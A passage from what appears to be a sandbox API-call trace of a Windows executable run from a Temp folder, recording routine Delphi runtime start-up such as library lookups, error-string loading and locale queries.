0x76c2e263 [0096.874] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeType") returned 0x76c15dee [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantCopy") returned 0x76c148f1 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantClear") returned 0x76c13eae [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="VariantInit") returned 0x76c13ed5 [0096.875] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="GetErrorInfo") returned 0x76c13f21 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0096.875] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76c10000 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysFreeString") returned 0x76c13e59 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysReAllocStringLen") returned 0x76c17810 [0096.875] GetProcAddress (hModule=0x76c10000, lpProcName="SysAllocStringLen") returned 0x76c145d2 [0096.875] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75830000 [0096.875] GetProcAddress (hModule=0x75830000, lpProcName="SHGetSpecialFolderPathW") returned 0x75850468 [0096.875] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="CharNextW") returned 0x76b50be6 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0096.875] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76b40000 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="PeekMessageW") returned 0x76b5634a [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MsgWaitForMultipleObjects") returned 0x76b537d8 [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxW") returned 0x76b9ea5f [0096.875] GetProcAddress (hModule=0x76b40000, lpProcName="LoadStringW") returned 0x76b4dfba [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="GetSystemMetrics") returned 0x76b567cf [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperBuffW") returned 0x76b5ebd5 [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharUpperW") returned 0x76b5e981 [0096.876] GetProcAddress (hModule=0x76b40000, lpProcName="CharLowerBuffW") returned 0x76b53afe [0096.876] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x40) returned 1 [0096.876] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x40, lpflOldProtect=0x12ff68 | out: lpflOldProtect=0x12ff68*=0x4) returned 1 [0096.876] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0096.876] SetThreadLocale (Locale=0x400) returned 1 [0096.876] GetVersion () returned 0x1db10106 [0096.876] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPreferredUILanguages") returned 0x769522d7 [0096.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPreferredUILanguages") returned 0x7694e627 [0096.877] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.877] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadUILanguage") returned 0x7694ae42 [0096.877] GetSystemInfo (in: lpSystemInfo=0x12fc34 | out: lpSystemInfo=0x12fc34*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0096.877] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"MASTER_STARTED\" \"60000\"" [0096.877] GetStartupInfoW (in: lpStartupInfo=0x12fc10 | out: lpStartupInfo=0x12fc10*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4, hStdOutput=0x200202, hStdError=0x1f80)) [0096.877] GetACP () returned 0x4e4 [0096.877] GetCurrentThreadId () returned 0xb78 [0096.877] GetVersion () returned 0x1db10106 [0096.877] GetVersionExW (in: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7728f879, dwMinorVersion=0x7728f99a, dwBuildNumber=0x141cb8, dwPlatformId=0x12fbaa, szCSDVersion="") | out: lpVersionInformation=0x12fb44*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.877] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x12da00, nSize=0x20a | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.877] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12d7ea, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.877] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1300000 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12d764 | out: phkResult=0x12d764*=0x0) returned 0x2 [0096.878] GetUserDefaultUILanguage () returned 0x409 [0096.880] IsValidLocale (Locale=0x409, dwFlags=0x2) returned 1 [0096.880] GetThreadUILanguage () returned 0x120409 [0096.880] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12d768) returned 1 [0096.880] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768 | out: pulNumLanguages=0x12d740, pwszLanguagesBuffer=0x142a680, pcchLanguagesBuffer=0x12d768) returned 1 [0096.880] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.en-US", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.en", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] GetUserDefaultUILanguage () returned 0x409 [0096.881] GetLocaleInfoW (in: Locale=0x409, LCType=0x3, lpLCData=0x12d784, cchData=4 | out: lpLCData="ENU") returned 4 [0096.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.ENU", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.EN", lpFindFileData=0x12d510 | out: lpFindFileData=0x12d510) returned 0xffffffff [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Method called on disposed object") returned 0x20 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Feature not implemented") returned 0x17 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Monitor support function not initialized") returned 0x28 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc4, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Object lock not owned") returned 0x15 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Exception in safecall method") returned 0x1c [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Interface not supported") returned 0x17 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="External exception %x") returned 0x15 [0096.881] LoadStringW (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Assertion failed") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffdc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid argument") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Error creating variant or safe array") returned 0x24 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Variant method calls not supported") returned 0x22 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant operation") returned 0x19 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid variant type conversion") returned 0x1f [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Stack overflow") returned 0xe [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Control-C hit") returned 0xd [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Privileged instruction") returned 0x16 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Access violation") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid class typecast") returned 0x16 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point underflow") returned 0x18 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point overflow") returned 0x17 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Floating point division by zero") returned 0x1f [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Invalid floating point operation") returned 0x20 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Integer overflow") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Range check error") returned 0x11 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x12dc34, cchBufferMax=4096 | out: lpBuffer="Division by zero") returned 0x10 [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Out of memory") returned 0xd [0096.882] LoadStringW (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x12dc2c, cchBufferMax=4096 | out: lpBuffer="Invalid pointer operation") returned 0x19 [0096.882] GetVersionExW (in: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12fb40*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.882] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0096.883] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x154448 [0096.884] GetProcAddress (hModule=0x76910000, lpProcName="GetNativeSystemInfo") returned 0x7694be77 [0096.884] GetNativeSystemInfo (in: lpSystemInfo=0x12fb1c | out: lpSystemInfo=0x12fb1c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff68, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows") returned 0x7 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff6b, lpBuffer=0x12db00, cchBufferMax=4096 | out: lpBuffer="Windows 7") returned 0x9 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid numeric input") returned 0x15 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Disk full") returned 0x9 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Read beyond end of file") returned 0x17 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="File access denied") returned 0x12 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Too many open files") returned 0x13 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff85, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="Invalid file name - %s") returned 0x16 [0096.884] LoadStringW (in: hInstance=0x400000, uID=0xff7d, lpBuffer=0x12dc24, cchBufferMax=4096 | out: lpBuffer="The specified file was not found") returned 0x20 [0096.884] GetVersionExW (in: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x10000, dwMinorVersion=0x5e030006, dwBuildNumber=0x11c, dwPlatformId=0x6, szCSDVersion="\x01") | out: lpVersionInformation=0x12fb34*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0096.884] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.884] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GetDiskFreeSpaceExW", cchWideChar=19, lpMultiByteStr=0x13f80dc, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetDiskFreeSpaceExW", lpUsedDefaultChar=0x0) returned 19 [0096.884] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceExW") returned 0x7694de40 [0096.884] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fa0a, nSize=0x105 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\NhsgKr2p.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\nhsgkr2p.exe")) returned 0x30 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Embarcadero\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\CodeGear\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x12fc18 | out: phkResult=0x12fc18*=0x0) returned 0x2 [0096.884] GetThreadLocale () returned 0x409 [0096.884] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x12fb50 | out: lpCPInfo=0x12fb50) returned 1 [0096.884] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0096.885] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76910000 [0096.885] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0096.885] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76910000 [0096.885] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x154458 [0096.885] GetProcAddress (hModule=0x76910000, lpProcName="GetLogicalProcessorInformation") returned 0x76942004 [0096.885] GetLogicalProcessorInformation (in: Buffer=0x0, ReturnedLength=0x12fab0 | out: Buffer=0x0, ReturnedLength=0x12fab0) returned 0 [0096.885] GetLastError () returned 0x7a [0096.885] GetLogicalProcessorInformation (in: Buffer=0x13e99d0, ReturnedLength=0x12fab0 | out: Buffer=0x13e99d0, ReturnedLength=0x12fab0) returned 1 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x100b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="2") returned 2 [0096.885] GetThreadLocale () returned 0x409 [0096.885] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f0d0, Locale=0x409, Calendar=0x2, CalType=0x4) returned 1 [0096.885] GetThreadLocale () returned 0x409 [0096.885] EnumCalendarInfoW (lpCalInfoEnumProc=0x41f174, Locale=0x409, Calendar=0x2, CalType=0x3) returned 1 [0096.885] GetCurrentThreadId () returned 0xb78 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sun") returned 4 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x30, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sunday") returned 7 [0096.885] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Mon") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2a, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Monday") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tue") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2b, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Tuesday") returned 8 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wed") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2c, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Wednesday") returned 10 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thu") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2d, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Thursday") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Fri") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2e, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Friday") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Sat") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x2f, lpLCData=0x12f8b4, cchData=256 | out: lpLCData="Saturday") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x44, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jan") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x38, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="January") returned 8 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x45, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Feb") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x39, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="February") returned 9 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x46, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Mar") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="March") returned 6 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x47, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Apr") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="April") returned 6 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x48, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="May") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x49, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jun") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="June") returned 5 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4a, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Jul") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="July") returned 5 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4b, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Aug") returned 4 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x3f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="August") returned 7 [0096.886] GetLocaleInfoW (in: Locale=0x409, LCType=0x4c, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Sep") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x40, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="September") returned 10 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x4d, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Oct") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x41, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="October") returned 8 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x4e, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Nov") returned 4 [0096.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x42, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="November") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x4f, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="Dec") returned 4 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x43, lpLCData=0x12f8b8, cchData=256 | out: lpLCData="December") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x14, lpLCData=0x12f908, cchData=256 | out: lpLCData="$") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1b, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1c, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x12fb00, cchData=2 | out: lpLCData=".") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x19, lpLCData=0x12f908, cchData=256 | out: lpLCData="2") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x12fb00, cchData=2 | out: lpLCData="/") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1f, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x20, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1009, lpLCData=0x12f8c0, cchData=256 | out: lpLCData="1") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x12fb00, cchData=2 | out: lpLCData=":") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x28, lpLCData=0x12f908, cchData=256 | out: lpLCData="AM") returned 3 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x29, lpLCData=0x12f908, cchData=256 | out: lpLCData="PM") returned 3 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x25, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0x1005, lpLCData=0x12f908, cchData=256 | out: lpLCData="0") returned 2 [0096.889] GetLocaleInfoW (in: Locale=0x409, LCType=0xc, lpLCData=0x12fb00, cchData=2 | out: lpLCData=",") returned 2 [0096.889] GetModuleHandleW (lpModuleName="oleaut32.dll") returned 0x76c10000 [0096.889] GetProcAddress (hModule=0x76c10000, lpProcName="VariantChangeTypeEx") returned 0x76c14c28 [0096.889] GetProcAddress (hModule=0x76c10000, lpProcName="VarNeg") returned 0x76c8c802 [0096.889] GetProcAddress (hModule=0x76c10000, 